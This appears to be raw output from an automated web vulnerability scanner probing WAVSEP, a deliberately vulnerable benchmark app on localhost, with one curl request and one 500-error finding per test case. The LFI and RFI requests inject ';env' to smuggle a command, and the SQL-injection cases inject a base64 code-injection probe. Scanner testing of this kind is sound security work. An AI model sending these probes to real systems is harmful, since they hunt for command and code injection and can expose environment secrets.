curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case27-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case27-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F&password=textvalue2 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F&password=textvalue2"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msg
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp?msg=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp?msg=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp?username=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F HTTP/1.1 Host: 127.0.0.1:8090
